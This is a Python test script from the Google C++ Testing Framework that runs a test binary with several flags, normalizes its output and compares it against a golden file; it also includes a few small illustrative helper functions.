# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests the text output of Google C++ Testing Framework.
SYNOPSIS
gtest_output_test.py --build_dir=BUILD/DIR --gengolden
# where BUILD/DIR contains the built gtest_output_test_ file.
gtest_output_test.py --gengolden
gtest_output_test.py
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import re
import sys
import gtest_test_utils
# The flag for generating the golden file
GENGOLDEN_FLAG = '--gengolden'
CATCH_EXCEPTIONS_ENV_VAR_NAME = 'GTEST_CATCH_EXCEPTIONS'
IS_WINDOWS = os.name == 'nt'
# TODO(vladl@google.com): remove the _lin suffix.
GOLDEN_NAME = 'gtest_output_test_golden_lin.txt'
PROGRAM_PATH = gtest_test_utils.GetTestExecutablePath('gtest_output_test_')
# At least one command we exercise must not have the
# --gtest_internal_skip_environment_and_ad_hoc_tests flag.
COMMAND_LIST_TESTS = ({}, [PROGRAM_PATH, '--gtest_list_tests'])
COMMAND_WITH_COLOR = ({}, [PROGRAM_PATH, '--gtest_color=yes'])
COMMAND_WITH_TIME = ({}, [PROGRAM_PATH,
'--gtest_print_time',
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=FatalFailureTest.*:LoggingTest.*'])
COMMAND_WITH_DISABLED = (
{}, [PROGRAM_PATH,
'--gtest_also_run_disabled_tests',
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=*DISABLED_*'])
COMMAND_WITH_SHARDING = (
{'GTEST_SHARD_INDEX': '1', 'GTEST_TOTAL_SHARDS': '2'},
[PROGRAM_PATH,
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=PassingTest.*'])
GOLDEN_PATH = os.path.join(gtest_test_utils.GetSourceDir(), GOLDEN_NAME)
def ToUnixLineEnding(s):
"""Changes all Windows/Mac line endings in s to UNIX line endings."""
return s.replace('\r\n', '\n').replace('\r', '\n')
def RemoveLocations(test_output):
"""Removes all file location info from a Google Test program's output.
Args:
test_output: the output of a Google Test program.
Returns:
output with all file location info (in the form of
'DIRECTORY/FILE_NAME:LINE_NUMBER: ' or
'DIRECTORY\\FILE_NAME(LINE_NUMBER): ') replaced by
'FILE_NAME:#: '.
"""
return re.sub(r'.*[/\\](.+)(\:\d+|\(\d+\))\: ', r'\1:#: ', test_output)
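# Hedged illustration, not part of the original test: a hypothetical helper
# showing how RemoveLocations collapses both POSIX- and Windows-style
# location prefixes to the 'FILE_NAME:#: ' form described above.
def _DemoRemoveLocations():
  sample = ('/home/user/gtest_output_test_.cc:123: Failure\n'
            'C:\\build\\gtest_output_test_.cc(123): error\n')
  # Both lines become 'gtest_output_test_.cc:#: ...'.
  return RemoveLocations(sample)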
def RemoveStackTraceDetails(output):
"""Removes all stack traces from a Google Test program's output."""
# *? means "find the shortest string that matches".
return re.sub(r'Stack trace:(.|\n)*?\n\n',
'Stack trace: (omitted)\n\n', output)
def RemoveStackTraces(output):
"""Removes all traces of stack traces from a Google Test program's output."""
# *? means "find the shortest string that matches".
return re.sub(r'Stack trace:(.|\n)*?\n\n', '', output)
def RemoveTime(output):
"""Removes all time information from a Google Test program's output."""
return re.sub(r'\(\d+ ms', '(? ms', output)
def RemoveTypeInfoDetails(test_output):
"""Removes compiler-specific type info from Google Test program's output.
Args:
test_output: the output of a Google Test program.
Returns:
output with type information normalized to canonical form.
"""
# some compilers output the name of type 'unsigned int' as 'unsigned'
return re.sub(r'unsigned int', 'unsigned', test_output)
def NormalizeToCurrentPlatform(test_output):
"""Normalizes platform specific output details for easier comparison."""
if IS_WINDOWS:
# Removes the color information that is not present on Windows.
test_output = re.sub('\x1b\\[(0;3\d)?m', '', test_output)
# Changes failure message headers into the Windows format.
test_output = re.sub(r': Failure\n', r': error: ', test_output)
# Changes file(line_number) to file:line_number.
test_output = re.sub(r'((\w|\.)+)\((\d+)\):', r'\1:\3:', test_output)
return test_output
def RemoveTestCounts(output):
"""Removes test counts from a Google Test program's output."""
output = re.sub(r'\d+ tests?, listed below',
'? tests, listed below', output)
output = re.sub(r'\d+ FAILED TESTS',
'? FAILED TESTS', output)
output = re.sub(r'\d+ tests? from \d+ test cases?',
'? tests from ? test cases', output)
output = re.sub(r'\d+ tests? from ([a-zA-Z_])',
r'? tests from \1', output)
return re.sub(r'\d+ tests?\.', '? tests.', output)
def RemoveMatchingTests(test_output, pattern):
"""Removes output of specified tests from a Google Test program's output.
This function strips not only the beginning and the end of a test but also
all output in between.
Args:
test_output: A string containing the test output.
pattern: A regex string that matches names of test cases or
tests to remove.
Returns:
Contents of test_output with tests whose names match pattern removed.
"""
test_output = re.sub(
r'.*\[ RUN      \] .*%s(.|\n)*?\[(  FAILED  |       OK )\] .*%s.*\n' % (
pattern, pattern),
'',
test_output)
return re.sub(r'.*%s.*\n' % pattern, '', test_output)
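# Hedged illustration (hypothetical helper): stripping one matching test's
# RUN/OK block from a fabricated fragment; the banner spacing mirrors real
# Google Test output.
def _DemoRemoveMatchingTests():
  fragment = ('[ RUN      ] SomeDeathTest.Foo\n'
              'intermediate output\n'
              '[       OK ] SomeDeathTest.Foo (0 ms)\n'
              '[ RUN      ] OtherTest.Bar\n')
  # Only the OtherTest.Bar line remains afterwards.
  return RemoveMatchingTests(fragment, 'DeathTest')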
def NormalizeOutput(output):
"""Normalizes output (the output of gtest_output_test_.exe)."""
output = ToUnixLineEnding(output)
output = RemoveLocations(output)
output = RemoveStackTraceDetails(output)
output = RemoveTime(output)
return output
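# Hedged illustration (hypothetical helper): the full normalization pipeline
# applied to a fabricated fragment of Google Test output.
def _DemoNormalizeOutput():
  raw = ('src/foo_test.cc:42: Failure\r\n'
         '[       OK ] FooTest.Bar (13 ms)\n')
  # Line endings, file locations and timings are all canonicalized, giving
  # 'foo_test.cc:#: Failure\n[       OK ] FooTest.Bar (? ms)\n'.
  return NormalizeOutput(raw)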
def GetShellCommandOutput(env_cmd):
"""Runs a command in a sub-process, and returns its output in a string.
Args:
env_cmd: The shell command. A 2-tuple where element 0 is a dict of extra
environment variables to set, and element 1 is a string with
the command and any flags.
Returns:
A string with the command's combined standard and diagnostic output.
"""
# Spawns cmd in a sub-process, and gets its standard I/O file objects.
# Set and save the environment properly.
environ = os.environ.copy()
environ.update(env_cmd[0])
p = gtest_test_utils.Subprocess(env_cmd[1], env=environ)
return p.output
def GetCommandOutput(env_cmd):
"""Runs a command and returns its output with all file location
info stripped off.
Args:
env_cmd: The shell command. A 2-tuple where element 0 is a dict of extra
environment variables to set, and element 1 is a string with
the command and any flags.
"""
# Disables exception pop-ups on Windows.
environ, cmdline = env_cmd
environ = dict(environ) # Ensures we are modifying a copy.
environ[CATCH_EXCEPTIONS_ENV_VAR_NAME] = '1'
return NormalizeOutput(GetShellCommandOutput((environ, cmdline)))
def GetOutputOfAllCommands():
"""Returns concatenated output from several representative commands."""
return (GetCommandOutput(COMMAND_WITH_COLOR) +
GetCommandOutput(COMMAND_WITH_TIME) +
GetCommandOutput(COMMAND_WITH_DISABLED) +
GetCommandOutput(COMMAND_WITH_SHARDING))
test_list = GetShellCommandOutput(COMMAND_LIST_TESTS)
SUPPORTS_DEATH_TESTS = 'DeathTest' in test_list
SUPPORTS_TYPED_TESTS = 'TypedTest' in test_list
SUPPORTS_THREADS = 'ExpectFailureWithThreadsTest' in test_list
SUPPORTS_STACK_TRACES = False
CAN_GENERATE_GOLDEN_FILE = (SUPPORTS_DEATH_TESTS and
SUPPORTS_TYPED_TESTS and
SUPPORTS_THREADS)
class GTestOutputTest(gtest_test_utils.TestCase):
def RemoveUnsupportedTests(self, test_output):
if not SUPPORTS_DEATH_TESTS:
test_output = RemoveMatchingTests(test_output, 'DeathTest')
if not SUPPORTS_TYPED_TESTS:
test_output = RemoveMatchingTests(test_output, 'TypedTest')
test_output = RemoveMatchingTests(test_output, 'TypedDeathTest')
test_output = RemoveMatchingTests(test_output, 'TypeParamDeathTest')
if not SUPPORTS_THREADS:
test_output = RemoveMatchingTests(test_output,
'ExpectFailureWithThreadsTest')
test_output = RemoveMatchingTests(test_output,
'ScopedFakeTestPartResultReporterTest')
test_output = RemoveMatchingTests(test_output,
'WorksConcurrently')
if not SUPPORTS_STACK_TRACES:
test_output = RemoveStackTraces(test_output)
return test_output
def testOutput(self):
output = GetOutputOfAllCommands()
golden_file = open(GOLDEN_PATH, 'rb')
# A mis-configured source control system can cause \r to appear in EOL
# sequences when we read the golden file irrespective of the operating
# system used. Therefore, we need to strip those \r's from newlines
# unconditionally.
golden = ToUnixLineEnding(golden_file.read())
golden_file.close()
# We want the test to pass regardless of certain features being
# supported or not.
# We still have to remove type name specifics in all cases.
normalized_actual = RemoveTypeInfoDetails(output)
normalized_golden = RemoveTypeInfoDetails(golden)
if CAN_GENERATE_GOLDEN_FILE:
self.assertEqual(normalized_golden, normalized_actual)
else:
normalized_actual = NormalizeToCurrentPlatform(
RemoveTestCounts(normalized_actual))
normalized_golden = NormalizeToCurrentPlatform(
RemoveTestCounts(self.RemoveUnsupportedTests(normalized_golden)))
# This code is very handy when debugging golden file differences:
if os.getenv('DEBUG_GTEST_OUTPUT_TEST'):
open(os.path.join(
gtest_test_utils.GetSourceDir(),
'_gtest_output_test_normalized_actual.txt'), 'wb').write(
normalized_actual)
open(os.path.join(
gtest_test_utils.GetSourceDir(),
'_gtest_output_test_normalized_golden.txt'), 'wb').write(
normalized_golden)
self.assertEqual(normalized_golden, normalized_actual)
if __name__ == '__main__':
if sys.argv[1:] == [GENGOLDEN_FLAG]:
if CAN_GENERATE_GOLDEN_FILE:
output = GetOutputOfAllCommands()
golden_file = open(GOLDEN_PATH, 'wb')
golden_file.write(output)
golden_file.close()
else:
message = (
"""Unable to write a golden file when compiled in an environment
that does not support all the required features (death tests, typed tests,
and multiple threads). Please generate the golden file using a binary built
with those features enabled.""")
sys.stderr.write(message)
sys.exit(1)
else:
gtest_test_utils.Main()
| mit |